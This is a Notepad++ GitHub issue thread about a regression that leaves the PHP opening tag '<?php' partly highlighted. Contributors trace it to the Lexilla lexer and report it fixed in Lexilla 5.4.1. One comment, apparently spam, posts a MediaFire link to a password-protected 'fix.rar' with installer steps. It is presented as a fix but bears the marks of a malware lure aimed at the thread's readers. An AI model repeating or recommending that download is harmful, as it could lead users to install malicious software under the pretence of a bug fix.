### ISSUE TITLE
[BUG] "<?php" opening tag may be wrongly highlighted in new/short PHP files

### ISSUE THREAD

**Issue by vlakoff** [notepad-plus-plus/notepad-plus-plus#15580]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description of the Issue

Since upgrading to Notepad 8.6.7 (I don't remember what version I was using before), when creating a new *.php file, the `<?php` opening tag may be only partially highlighted.

Although it could be considered as a minor issue, as an OCPD person it is absolutely horrible for me!! (also, this issue might be the tip of some more important problem)

### Steps To Reproduce

1.  Create a new *.php file.
2.  Type `<?php`

### Current Behavior

`<?` is highlighted, `php` is not.

### Expected Behavior

Entire `<?php` should be highlighted.

### Debug Information

```shell
Tried with Notepad++ 8.6.7 and 8.6.9, 32-bit.
```

### Anything else?

The conditions that trigger this highlighting issue are unclear. For example, if the content is `<?php //` the tag is correctly highlighted.

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vlakoff** [comment]
Code searches brought me to these parts:

* https://github.com/notepad-plus-plus/notepad-plus-plus/blob/d2bb7a2af662db1632a64d5374cd4e08e50e18ba/PowerEditor/src/ScintillaComponent/Buffer.cpp#L1528
* https://github.com/notepad-plus-plus/notepad-plus-plus/blob/d2bb7a2af662db1632a64d5374cd4e08e50e18ba/lexilla/lexers/LexHTML.cxx#L678

----

Regression possibly introduced by:
https://github.com/notepad-plus-plus/notepad-plus-plus/commit/d8c6350918b76b040e55010feb0c16b7b03ac2da#diff-e092f6bc1b6b01fab5284c6bb30930d225205d145b6aedda43f9e2a93121587d

**Comment by vlakoff** [comment]
Regression possibly introduced by:
https://github.com/notepad-plus-plus/notepad-plus-plus/commit/d8c6350918b76b040e55010feb0c16b7b03ac2da#diff-e092f6bc1b6b01fab5284c6bb30930d225205d145b6aedda43f9e2a93121587d

(edit: no… this commit is one month old, and I am encountering the issue for longer)

**Comment by rdipardo** [comment]
This issue belongs here: <https://github.com/ScintillaOrg/lexilla/issues>

**Comment by vlakoff** [comment]
I have tried several versions of Notepad++, and the regression appeared in version 8.6.6. Therefore, the regression should have been introduced by https://github.com/notepad-plus-plus/notepad-plus-plus/commit/881e8c285e6e7e171b57572eb6e811758894df17 (Update to scintilla 5.5.0 & Lexilla 5.3.2).

I can reproduce the problem in SciTE editor as well, which confirms it is an issue in Lexilla.

The regression _might_ have been caused by https://github.com/ScintillaOrg/lexilla/commit/1c6e3e5edd29c680a4098d9a4bcac4f3733b700d.

Indeed, a ticket should be opened at Lexilla for further discussion.

**Comment by rdipardo** [comment]
> Indeed, a ticket should be opened at Lexilla for further discussion.

https://github.com/ScintillaOrg/lexilla/issues/269

**Comment by vlakoff** [comment]
The problem has been solved in Lexilla 5.4.1 (thanks to [zufuliu](https://github.com/zufuliu) and [nyamatongwe](https://github.com/nyamatongwe)), which was released yesterday.

**Comment by vlakoff** [comment]
Fixed by:
- #15717
